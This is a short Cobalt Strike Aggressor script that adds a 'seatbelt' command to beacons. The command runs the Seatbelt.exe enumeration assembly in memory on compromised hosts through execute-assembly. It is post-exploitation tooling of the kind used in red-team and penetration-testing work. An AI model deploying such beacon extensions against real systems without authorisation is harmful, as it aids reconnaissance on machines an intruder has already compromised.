beacon_command_register("seatbelt", "performs a number of 'safety checks' from both offensive and defensive perspectives.",
	"Usage: seatbelt [arguments]\n\n" .
	"Uses execute-assembly to run the assembly and takes given arguments\n");
alias seatbelt{
	local('$bid $asm $desc @args $argu');
	$bid = $1;
	$asm = "/opt/cobalt_strike_extension_kit/exe/Seatbelt.exe";
	$desc = "SeatBelt";
	@args = @_;
	remove(@args, $bid);
	$argu = join(' ', @args);
	if ($argu eq ""){
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
	}
	else{
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
	}
	bexecute_assembly!($bid, $asm, $argu);
}
